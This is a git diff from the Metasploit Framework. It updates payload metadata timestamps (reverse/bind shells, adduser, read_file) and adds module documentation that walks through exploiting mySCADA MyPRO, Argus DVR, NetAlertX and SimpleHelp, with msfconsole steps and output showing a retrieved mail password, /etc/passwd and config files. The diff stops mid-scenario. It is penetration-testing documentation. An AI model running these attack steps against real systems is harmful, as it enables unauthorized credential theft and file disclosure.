    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-10-01 02:43:44 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/riscv32le/reboot.rb",
    "is_install_path": true,
    "ref_name": "linux/riscv32le/reboot",
@@ -238708,7 +245462,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-10-05 00:01:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/riscv64le/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/riscv64le/exec",
@@ -238744,7 +245498,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2024-10-01 02:43:44 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/riscv64le/reboot.rb",
    "is_install_path": true,
    "ref_name": "linux/riscv64le/reboot",
@@ -238781,7 +245535,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x64/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/exec",
@@ -238818,7 +245572,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter/bind_tcp",
@@ -238857,7 +245611,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-04-27 16:21:34 +0000",
+    "mod_time": "2024-12-20 04:15:41 +0000",
    "path": "/modules/payloads/stagers/linux/x64/reverse_sctp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter/reverse_sctp",
@@ -238897,7 +245651,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-20 04:15:41 +0000",
    "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/meterpreter/reverse_tcp",
@@ -239049,7 +245803,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x64/pingback_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/pingback_bind_tcp",
@@ -239085,7 +245839,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/pingback_reverse_tcp",
@@ -239121,7 +245875,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/x64/bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell/bind_tcp",
@@ -239160,7 +245914,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-04-27 16:21:34 +0000",
+    "mod_time": "2024-12-20 04:15:41 +0000",
    "path": "/modules/payloads/stagers/linux/x64/reverse_sctp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell/reverse_sctp",
@@ -239199,7 +245953,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2024-12-20 04:15:41 +0000",
    "path": "/modules/payloads/stagers/linux/x64/reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell/reverse_tcp",
@@ -239237,7 +245991,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_bind_ipv6_tcp",
@@ -239273,7 +246027,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_bind_tcp",
@@ -239309,7 +246063,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-07-27 16:02:37 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_bind_tcp_random_port",
@@ -239345,7 +246099,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_find_port.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_find_port",
@@ -239381,7 +246135,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_reverse_ipv6_tcp",
@@ -239417,7 +246171,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x64/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x64/shell_reverse_tcp",
@@ -239455,7 +246209,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/adduser.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/adduser",
@@ -239491,7 +246245,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/chmod.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/chmod",
@@ -239529,7 +246283,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/exec.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/exec",
@@ -239647,7 +246401,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter/bind_nonx_tcp",
@@ -239767,7 +246521,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/x86/find_tag.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter/find_tag",
@@ -239806,7 +246560,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter/reverse_ipv6_tcp",
@@ -239845,7 +246599,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/meterpreter/reverse_nonx_tcp",
@@ -240079,7 +246833,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/metsvc_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/metsvc_bind_tcp",
@@ -240115,7 +246869,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/metsvc_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/metsvc_reverse_tcp",
@@ -240151,7 +246905,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/read_file.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/read_file",
@@ -240268,7 +247022,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/x86/bind_nonx_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell/bind_nonx_tcp",
@@ -240385,7 +247139,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/x86/find_tag.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell/find_tag",
@@ -240424,7 +247178,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/x86/reverse_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell/reverse_ipv6_tcp",
@@ -240462,7 +247216,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2020-09-22 02:56:51 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/stagers/linux/x86/reverse_nonx_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell/reverse_nonx_tcp",
@@ -240580,7 +247334,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/shell_bind_ipv6_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell_bind_ipv6_tcp",
@@ -240616,7 +247370,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell_bind_tcp",
@@ -240654,7 +247408,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/shell_bind_tcp_random_port.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell_bind_tcp_random_port",
@@ -240690,7 +247444,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2021-01-05 14:59:46 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/shell_find_port.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell_find_port",
@@ -240726,7 +247480,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/shell_find_tag.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell_find_tag",
@@ -240763,7 +247517,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell_reverse_tcp",
@@ -240799,7 +247553,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-09-22 12:55:41 +0000",
+    "mod_time": "2025-01-14 09:31:03 +0000",
    "path": "/modules/payloads/singles/linux/x86/shell_reverse_tcp_ipv6.rb",
    "is_install_path": true,
    "ref_name": "linux/x86/shell_reverse_tcp_ipv6",
@@ -201,7 +201,7 @@ This data breaks down to the following table:
 | MSCash2                              | mscash2-hashcat    | `$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f`                                                                                                                                                                                                                     | hashcat      | mscash2              |                                                  | auxiliary/analyze/crack_windows                           |
 | MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql                | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
-| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
+| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password1!    | mssql12              | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql                | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1           | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
 | Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle           | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
@@ -86,8 +86,7 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
  options](#Filtering-datastore-options) section for more information.
 * **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
-  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
-  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole
+  support gracefully checking a list of more generic fallbacks option names such as `Username`.

 Now let's talk about what classes are available:

@@ -15,27 +15,27 @@ Once the appropriate repository label is added, you will need to edit the GitHub
 repository and branch you want to test. Below I will outline some changes that are required to make this work, update 
 the following lines like so:

-1. Point at your forked repository - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L188):
+1. Point at your forked repository - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L189):
 ```yaml
 repository: foo-r7/metasploit-framework
 ```

-2. Point at your forked repository branch - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L190):
+2. Point at your forked repository branch - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L191):
 ```yaml
 ref: fixes-all-the-bugs
 ```

-3. Point at your forked repository that contains the payload changes you'd like to test - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L249)
+3. Point at your forked repository that contains the payload changes you'd like to test - update lines [45](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L45) and [250](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L250):
 ```yaml
 repository: foo-r7/metasploit-payloads
 ```

-4. Point at your forked repository branch that contains the payload changes you'd like to test - [line to update](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L251):
+4. Point at your forked repository branch that contains the payload changes you'd like to test - update lines [47](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L47) and [252](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L252):
 ```yaml
 ref: fixes-all-the-payload-bugs
 ```

 Steps 3 and 4 outline the steps required when steps testing metasploit-payloads. The same steps apply for Mettle, the 
 following lines would need updated:
- - Point at your forked repository that contain the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L155).
- - Point at your forked repository branch that contains the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L157).
+ - Point at your forked repository that contain the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L156).
+ - Point at your forked repository branch that contains the payload changes you'd like to test - [line](https://github.com/rapid7/metasploit-framework/blob/2355ab546d02bfee99183083b12c6953836c12a1/.github/workflows/shared_meterpreter_acceptance.yml#L158).
@@ -0,0 +1,64 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits two vulnerabilities (CVE-2025-24865 & CVE-2025-22896) in mySCADA MyPRO Manager <= v1.3 to retrieve the configured
+credentials for the mail server.
+
+The administrative web interface has certain features where credentials are required to be accessed, but the implementation is flawed,
+allowing to bypass the requirement. Other important administrative features do not require credentials at all, allowing an unauthenticated
+remote attacker to perform privileged actions. These issues are tracked through CVE-2025-24865.
+Another vulnerability, tracked through CVE-2025-22896, is related to the cleartext storage of various credentials by the application.
+
+One way how these issues can be exploited is to allow an unauthenticated remote attacker to retrieve the cleartext credentials of the mail
+server that is configured by the product, which this module does.
+
+Versions <= 1.3 are affected. CISA published [ICSA-25-044-16](https://www.cisa.gov/news-events/ics-advisories/icsa-25-044-16) to cover
+the security issues.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor](https://www.myscada.org/mypro/).
+
+**Successfully tested on**
+
+- mySCADA MyPRO Manager 1.3 on Windows 11 (22H2)
+
+## Verification Steps
+
+1. Install the application
+2. After installation, reboot the system and wait some time until a runtime (e.g., 9.2.1) has been fetched and installed.
+3. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use auxiliary/admin/scada/mypro_mgr_creds 
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > set RHOSTS <IP>
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run 
+```
+
+## Scenarios
+
+Running the module against MyPRO Manager v1.3 on Windows 11, should result in an output similar to the
+following:
+
+```
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > run
+[*] Running module against 192.168.1.78
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[+] Mail server credentials retrieved:
+[+] Host: smtp.example.com
+[+] Port: 993
+[+] Auth Type: login
+[+] User: user
+[+] Password: SuperS3cr3t!
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/scada/mypro_mgr_creds) > creds
+Credentials
+===========
+
+host          origin        service           public  private       realm  private_type  JtR Format  cracked_password
+----          ------        -------           ------  -------       -----  ------------  ----------  ----------------
+192.168.1.78  192.168.1.78  34022/tcp (http)  user    SuperS3cr3t!         Password
+```
@@ -0,0 +1,46 @@
+## Vulnerable Application
+This module leverages an issue with how the `RESULTPAGE` parameter within `WEBACCCOUNT.cgi` handles file referencing and as a result is vulnerable to Local File Inclusion (LFI). 
+
+## Options
+To successfully read contents of the Windows file system you must set the full file path of the file you want to check using `TARGET_FILE` (not including the drive letter prefix). 
+As a first run it is recommended to try leaking `Windows/system.ini` as a validation exercise on your first module run.
+
+## Testing
+To setup a test environment, the following steps can be performed:
+1. Set up a Windows operating system (any OS that has C:\Windows\system.ini)
+2. Download the [Argus DVR 4 Software](https://download.cnet.com/argus-surveillance-dvr/3000-2348_4-10576796.html)
+3. Run the Argus software and a webpage running on port 8080 will appear. Take note of the machine's IP
+4. On your attacker machine follow the verification steps below.
+
+## Verification Steps
+1. start msfconsole
+2. `use auxiliary/gather/argus_dvr4_lfi_cve_2018_15745`
+3. `set RHOSTS <TARGET_IP_ADDRESS>`
+4. `set TARGET_FILE Windows/system.ini`
+5. `run`
+
+## Scenarios
+### Utilising Argus DVR 4 CVE-2018-15745 to Leak DVRParams.ini
+```
+msf6 > use auxiliary/gather/argus_dvr_4_lfi_cve_2018_15745 
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set RHOSTS 192.168.1.15
+RHOSTS => 192.168.1.15
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > set TARGET_FILE ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+TARGET_FILE => ProgramData/PY_Software/Argus Surveillance DVR/DVRParams.ini
+msf6 auxiliary(gather/argus_dvr_4_lfi_cve_2018_15745) > run
+[*] Running module against 192.168.1.15
+[*] Sending request to 192.168.1.15:8080 for file: ProgramData/PY_Software/Argus%20Surveillance%20DVR/DVRParams.ini
+[+] File retrieved successfully!
+[Main]
+ServerName=
+ServerLocation=
+ServerDescription=
+ReadH=0
+UseDialUp=0
+DialUpConName=
+DialUpDisconnectWhenDone=0
+DIALUPUSEDEFAULTS" checked checked
+
+[*] Auxiliary module execution completed
+
+```
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+
+An attacker can read any file through log functionality with no authentication.
+
+The vulnerability affects:
+
+    * v24.7.18 <= NetAlertX <= v24.9.12
+
+## Verification Steps
+
+### Installation
+
+1. `docker pull jokobsk/netalertx:24.9.12`
+
+2. docker run
+```bash
+docker run --rm --network=host \
+  -v /tmp/netalertx:/app/config \
+  -v /tmp/netalertx:/app/db \
+  -e TZ=Europe/Berlin \
+  -e PORT=20211 \
+  jokobsk/netalertx:24.9.12
+```
+
+### Verification
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/netalertx_file_read`
+4. Do: `run rhost=<rhost>`
+5. You should get the contents of the specified file.
+
+## Options
+
+- `RHOSTS`: target host
+- `RPORT`: target port, default 20211
+- `FILEPATH`: path to the required file
+- `DEPTH`: number of `../` to be prepended to `FILEPATH`
+
+## Scenarios
+
+```
+msf6 > use auxiliary/scanner/http/netalertx_file_read 
+msf6 auxiliary(scanner/http/netalertx_file_read) > show options
+
+Module options (auxiliary/scanner/http/netalertx_file_read):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   DEPTH     5                yes       Traversal Depth (to reach the root folder)
+   FILEPATH  /etc/passwd      yes       The path to the file to read
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
+                                        tml
+   RPORT     20211            yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   THREADS   1                yes       The number of concurrent threads (max one per host)
+   VHOST                      no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/netalertx_file_read) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(scanner/http/netalertx_file_read) > run
+[*] Received data:
+[*] root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+catchlog:x:100:101:catchlog:/:/sbin/nologin
+nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
+
+[*] Stored results in netalert_result.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/netalertx_file_read) > 
+
+
+```
+
+
@@ -0,0 +1,93 @@
+## Vulnerable Application
+There exists a path traversal vulnerability in the /toolbox-resource endpoint of SimpleHelp that enables unauthenticated
+remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests
+
+### Setup
+
+On Ubuntu 22.04 download a vulnerable version of SimpleHelp, for this demo we will use 5.5.7:
+`wget https://simple-help.com/releases/5.5.7/SimpleHelp-linux-amd64.tar.gz`
+
+Unzip the application:
+```
+cd /opt
+tar -xvf SimpleHelp-linux-amd64.tar.gz
+```
+
+Start the server:
+```
+cd SimpleHelp
+sudo sh serverstart.sh
+```
+
+Navigate to the Web App GUI at: `http://127.0.0.1` (by default the application should be listening on all interfaces).
+You should see "Welcome to your new SimpleHelp Server".
+Select "Start New Server". The application should now be vulnerable to the path traversal.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use simplehelp_toolbox_path_traversal`
+1. Set the `RHOST`
+1. Run the module
+1. Receive the file `serverconfig.xml` from the SimpleHelp
+
+## Scenarios
+### SimpleHelp 5.5.7 running on Ubuntu 22.04
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > use simplehelp_toolbox_path_traversal
+
+Matching Modules
+================
+
+   #  Name                                                      Disclosure Date  Rank    Check  Description
+   -  ----                                                      ---------------  ----    -----  -----------
+   0  auxiliary/scanner/http/simplehelp_toolbox_path_traversal  2025-01-12       normal  No     Simple Help Path Traversal Vulnerability
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/simplehelp_toolbox_path_traversal
+
+[*] Using auxiliary/scanner/http/simplehelp_toolbox_path_traversal
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set rhost 172.16.199.130
+rhost => 172.16.199.130
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > run
+[*] Reloading module...
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 5.5.7
+[+] Downloaded 5233 bytes
+[+] File saved in: /Users/jheysel/.msf4/loot/20250220163655_default_172.16.199.130_simplehelp.trave_035651.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### SimpleHelp 5.5.7 running on Windows 11
+```
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set rhosts 172.16.199.131
+rhosts => 172.16.199.131
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set filepath windows/system.ini
+filepath => windows/system.ini
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set depth 4
+depth => 4
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > run
+[*] Running automatic check ("set AutoCheck false" to disable)
